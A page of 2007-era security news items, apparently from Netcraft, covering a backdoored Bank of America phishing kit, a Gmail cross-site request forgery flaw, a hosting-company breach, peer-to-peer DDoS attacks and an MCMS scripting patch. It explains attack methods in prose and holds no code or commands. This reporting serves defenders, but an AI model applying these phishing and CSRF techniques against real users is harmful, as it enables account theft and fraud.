Phishing kits take advantage of novice fraudsters

A phishing kit targeting the Bank of America contains an interesting insight into the intellectual hierarchy involved in Internet fraud. At first glance, the phishing kit looks attractive to any fraudster – it is straightforward to deploy on any web server that supports PHP, and a single configuration file makes it easy to specify an electronic mail address to receive captured financial details. In addition to requesting the credit card numbers and bank account details, a second form on the phishing site asks for the victim's SiteKey challenge questions and answers, which can help a fraudster gain access to the victim's Internet banking facilities.

bofa-config.png
The email address configured in the phishing kit.

However, while the phishing kit is easy to use, an encrypted component within the kit is used to send a copy of the captured details to an additional gmail address, which belongs to the author. This will not be obvious to most fraudsters using the kit, as the relevant code is detached from the configuration file and is heavily obfuscated, requiring some effort to decode.

bofa-obfuscated.png
The obfuscated code which sends a copy of the financial details to the author.

Such deception is a useful tactic for any fraudster who wishes to maximize the number of successful attacks, as the work of deploying the phishing sites and sending the mails is then carried out free of charge by novice fraudsters on behalf of the author. This relieves the author of the burden of having to carry out the more time consuming aspects of phishing – finding bulletproof web hosting, hacking into host web sites, and sending millions of phishing mails – whilst benefiting by receiving mails from each and every deployment of their own phishing kit.

bofa-screenshot.png
The phishing kit in action.

Google Fixes Gmail Cross-site Request Forgery Vulnerability

Google has fixed a vulnerability in their Gmail web based email service which would have allowed internet attackers to steal mail messages from users without being noticed.

The attack works by forcing a logged-in user to add a mail filter to their Gmail account, thereby allowing their mail to be forwarded to an external mail address controlled by the attacker. Because the Gmail service did not adequately verify the origin of such requests, it was possible for attackers to create their own web pages that used JavaScript to automatically make such requests on behalf of their victims. In essence, a Gmail user would visit one of these pages and have their account compromised without necessarily realising anything is awry. Only close inspection of the Filters tab in the Gmail Settings menu would reveal what had happened.

gmail.png

Proof of concept exploits used JavaScript to make a silent POST request to the Gmail service and add the attacker’s filter. With the results of the request hidden in an iframe, it is highly unlikely that a victim will have noticed that their Gmail account would have been compromised, particularly while they are browsing a completely different website. While this attack scenario would only be successful if the victim was logged in, many Gmail users remain constantly logged in throughout the day, thus increasing the likelihood of a successful attack.

The technique used by this exploit is known as CSRF (Cross-site Request Forgery) and is becoming an increasingly common method to attack web applications. If a web application is vulnerable to CSRF, it will allow unauthorised attackers to carry out arbitrary actions in the context of an authorised, logged in user of the application. Not only does this make a hacker’s life easier, but it also helps them to cover up their tracks, as malicious actions will appear to be carried out, unwittingly, by authorised users of the system.

Compromised webmail accounts are regarded as a valuable commodity by hackers, as they often contain information that would allow an attacker to gain unauthorised access to other systems, such as internet banking, and to harvest credit card details from online stores used by the victim. Because the attacker is now effectively in control of their victim’s email, they could also attack other accounts belonging to the victim by following “forgotten password” links and obtaining the relevant passwords via email.

Cross-site Request Forgery vulnerabilities are often difficult to identify using automated tools and typically require testing by security aware developers.

Hackers Crack Layered Tech Database

Dedicated hosting company Layered Technologies is advising customers to reset account logins after an incident Monday night in which hackers were able to access a client support database. Layered Tech said it doesn't believe that any customer credit card numbers were compromised, but is nonetheless advising customers to change the login credentials on all their servers and underlying services created in the past two years, including webmail, SSH access, MySQL databases and cPanel reseller control panels.

"The Layered Technologies support database was a target of malicious activity on the evening of 9/17/2007 that may have involved the illegal downloading of information such as names, addresses, phone numbers, email addresses and server login details for 5 to 6,000 of our clients," company president Todd Abrams wrote to customers. "Layered Technologies responded immediately to this specific incident by conducting a comprehensive security audit of internal processes and procedures."

Continue reading

P2P Networks Hijacked for DDoS Attacks

Peer-to-peer networks are being hijacked to launch an increasing number of distributed denial of service (DDoS) attacks on web sites, according to security researchers and network service providers. In these attacks, large numbers of client computers running P2P software are tricked into requesting a file from the intended target of the DDoS, allowing the attacker to use the P2P network to overwhelm the target site with traffic.

These type of attacks had been discussed in papers by security researchers last year, but began appearing on the Internet in early 2007 and have accelerated in recent weeks, according to Prolexic Technologies, which specializes in DDoS defense. In a May 14 advisory, Prolexic reported an increase in the number and frequency of attacks. "The rash of large P2P attacks we have seen in the last month is a perfect example of how the DDoS problem constantly evolves," said Darren Rennick, CEO of Prolexic. "Until January of this year we had never seen a peer-to-peer network subverted and used for an attack. We now see them constantly being subverted."

The company said as many as 100,000 machines had been used in some of the attacks. The peer-to-peer DDoSes may be attractive to attackers, as they don't require the use of an existing "botnet" of compromised computers.

Continue reading

U.S. Military Blocks MySpace

The U.S. Department of Defense has begun blocking access to MySpace and YouTube on its network, citing security concerns and the need to prevent the network from being slowed by video traffic. "This is a bandwidth and network management issue," Julie Ziegenhorn, spokeswoman for U.S. Strategic Command, told Stars & Stripes. "We’ve got to have the networks open to do our mission. They have to be reliable, timely and secure."

Many troops stationed overseas use the DoD network to access the Internet, but some others use local providers. Ziegenhorn said the sites were becoming "a drain on the system," but the Stars & Stripes story also mentions security several times. MySpace has been a regular target of phishing scams seeking to steal account credentials. MySpace accounts themselves are of limited value, but can serve as a delivery mechanism for keylogging trojans, capturing home computers that may be used for shopping or online banking as well as social networking. Keylogging trojans would be problematic on computers on a secure military network.

Continue reading

Microsoft Patches Critical MCMS Security Hole

Microsoft's latest security updates include a patch for a security hole in Microsoft Content Management Server (MCMS) discovered by Netcraft's Martyn Tovey. Microsoft update MS07-18 addresses two issues in MCMS, including a cross-site scripting and spoofing vulnerability that was reported to Microsoft by Netcraft.

"The vulnerability could allow the injection of a client-side script in the user's browser," Microsoft notes in its summary. "In a Web-based attack scenario a compromised Web site could accept or host user-provided content or advertisements which could contain specially crafted content that could exploit this vulnerability. The script could take any action on the user's behalf that the Web site is authorized to take. This could include monitoring the Web session and forwarding information to a third party, running other code on the user's system, and reading or writing cookies."

Microsoft Content Management Server allows developers to build complex web sites atop the .NET framework, and is typically used to manage enterprise portals and e-commerce sites. Many of the functions of MCMS 2002 have been integrated into Office SharePoint Server 2007 product. MCMS continues to be widely used, and was found on more than 5,000 sites last year.

Netcraft provides a Web Application Testing service that rigorously tests the defenses of Internet networks and applications. It is part of the Audited by Netcraft service, which provides a range of advanced Internet security tests.